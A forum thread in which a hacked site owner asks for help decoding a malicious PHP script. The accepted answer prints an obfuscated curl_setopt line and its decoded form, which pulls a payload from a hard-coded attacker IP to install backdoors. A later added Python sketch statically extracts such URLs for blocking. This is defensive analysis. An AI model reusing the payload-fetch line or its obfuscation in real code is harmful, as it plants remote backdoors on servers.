dongyu4455 2012-09-28 22:12

Unable to decode this hacker code [closed]

Today my sites were hacked and here is one of the PHP scripts I found: https://docs.google.com/open?id=0B7aEugGV1GwTNnd2c2Fqei1vakE .

I changed eval to print in this code but I'm not able to decode the source code of the script.

I want to see what this script was doing for 1 week in my sites. I figured it out due to site denial attack from these scripts which ultimately changed the .htaccess code.

I've even tried to find any known common threats in Google using the script names and comment lines but I found none.


  • donjao6770 2012-09-28 22:46

    Disclaimer

    After decoding I arrived at http://pastebin.com/VGqeGDkH. Please don't run the above code on your system, because it is not the only file that would be downloaded to your system.

    The hacker sends a curl or file_get_contents request to:

    curl_setopt($vH5wU9kS8uO3wG9xI7wR5aV1fS3vU2qC2bA6yP9oG2uZ1zF7zZ5dR8gI0tJ3jV3oB0cD1iN6dD1vL8gL2uP4fX0yU2tF4bR8qD1xB2pL7eS9kW2rI7vD1dS5oA4iP9jH6, CURLOPT_URL, "$pO6oA9pF4aY2lO7dY9vK3sU7nL8lF4gL1dY7uD8mU4xH9gM2hR9gT8tA6dJ1aB9sA8wP3sO5zI8xR2eZ0aD4dK7uQ0rG7aA7nI6kZ3kI3tG5$cO9qE4hY7wW5rJ7qL1bN7uP0dE2zE9rB2bV6lY3sJ8eO3rN3pR0tA8mA0qR1oK2dE9qM3yH0kB1wU1qX2pJ0bS5xV4mG7pY1pI6iK8eP8xY3yX2$kI8yO6lP1lN7wX0fV2kY1zI9vO3mS6wK3lT9gH9rE6tZ8xT6dE7wG4dP5iJ0mC7bX0zJ3tO1iD0eD2hE4cJ0pG4gZ1bC8lT5jM1iK8hD3$tV3uB4lG2gC9iV5fE4bJ3lC6mO1sN2hE7tH0gA0iC9cT5eR4pE2aW4nA7qI5oA8uW7mZ2fE6cQ7rB9cR0xG4gY9rM9hC2rN1$tV3uB4lG2gC9iV5fE4bJ3lC6mO1sN2hE7tH0gA0iC9cT5eR4pE2aW4nA7qI5oA8uW7mZ2fE6cQ7rB9cR0xG4gY9rM9hC2rN1$fK3iD2pY6sG1xV5wB5wU8pJ1hP2qW7wZ5sI1kS4pN0pO7bD1fE1vZ2aL3pV0uZ2fI3eQ4kI9aD8wN5bF0jR8aQ8sN6rD0pV6sM4uJ7zK6aW5dR4bC7$tV3uB4lG2gC9iV5fE4bJ3lC6mO1sN2hE7tH0gA0iC9cT5eR4pE2aW4nA7qI5oA8uW7mZ2fE6cQ7rB9cR0xG4gY9rM9hC2rN1$zP3dW5gU5bS0sO7aO2cQ5tD0eV6cD9rW9sJ9jM0kO6zK8wL8hL9xU3zI1gJ7xT2rX9tO9wD6gL0pV5eD2rT4hL2uP1jB9sE2cU0fG6gJ1zM0pM2vS1wZ8lQ7uN8qA6eY0$qM2xA6eC8gQ2lE0qQ8eM7xT2dV5sS1aW2wH3qL5dG5sF3fI4zA1xG9gN9xV7fO4zT5qV2yU1gC2lR2vB1hF5dO6gC9xH6aC1wA6$zV0mR4mU2lH5iU0qI9iN1vM6eU2uO2qJ2fH4mY7wK1kH5nR0fE4yV8rI0vR3lM3zW2jK8cG3dX4zM3oQ8iK0iK7yS1fY0oE4yZ3xN7iI4sN6");
    

    After decoding you would get

    curl_setopt($ch, CURLOPT_URL, "http://95.211.128.197/100JS71MLKpzPzFbcYeVvZUMxCRUKBVFFx6iO6pr2VfhBthyzGcp.txt");
    

    This would then download files and different backdoors to the system.

    The hacker also used a lot of advanced methods such as encryption, variable recursion, and plenty of backups. He also made sure that the final bot was not discovered by Google, Yahoo, Microsoft Corp, AMAZON, UCSD.EDU, Indiana University, Sonic.net, MCAFEE INTERNATIONAL, and hz

    My Advice

    Contact your hosting company or a security professional. Your server needs to be checked.

    This answer was selected by the asker as the best answer.
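The `curl_setopt` line in the answer hides its URL behind variables interpolated into a double-quoted string. As an added example (not code from the post or from the malware), this Python sketch recovers such a URL by reading the PHP as text, never executing it. It assumes the variables are set by plain literal assignments; `SAMPLE`, its variable names and the 192.0.2.10 address are constructed, and `{$var}` syntax, `.` concatenation and encoded layers are out of scope.

```python
import re

# $name = "literal";  or  $name = 'literal';
ASSIGN = re.compile(r'\$(\w+)\s*=\s*("(?:[^"\\]|\\.)*"|\'(?:[^\'\\]|\\.)*\')\s*;')
DQ_STRING = re.compile(r'"((?:[^"\\]|\\.)*)"')   # PHP interpolates only in "..."
VAR = re.compile(r'(?<!\\)\$(\w+)')              # $name, but not an escaped \$name
URL = re.compile(r'https?://[^\s"\'<>]+')

# Constructed sample imitating the obfuscation style; not the real script.
SAMPLE = r'''<?php
$aB1 = "http://";
$cD2 = '192.0.2.10';
$gH4 = "$aB1$cD2";
$eF3 = "/stage2.txt";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$gH4$eF3");
'''

def interpolate(text, table):
    """Expand known $name references; unknown names are left untouched."""
    return VAR.sub(lambda m: table.get(m.group(1), m.group(0)), text)

def build_table(source):
    """Record literal assignments in file order, expanding "..." values as PHP would."""
    table = {}
    for m in ASSIGN.finditer(source):
        name, literal = m.group(1), m.group(2)
        body = literal[1:-1]
        table[name] = interpolate(body, table) if literal[0] == '"' else body
    return table

def extract_urls(source):
    """Return URLs that appear once every double-quoted string is expanded."""
    table = build_table(source)
    urls = []
    for m in DQ_STRING.finditer(source):
        for url in URL.findall(interpolate(m.group(1), table)):
            if url not in urls:
                urls.append(url)
    # Drop fragments that are only a prefix of a longer recovered URL.
    return [u for u in urls if not any(o != u and o.startswith(u) for o in urls)]

if __name__ == "__main__":
    print(extract_urls(SAMPLE))
```

Recovered URLs can go straight into egress firewall rules and searches of web server and proxy logs.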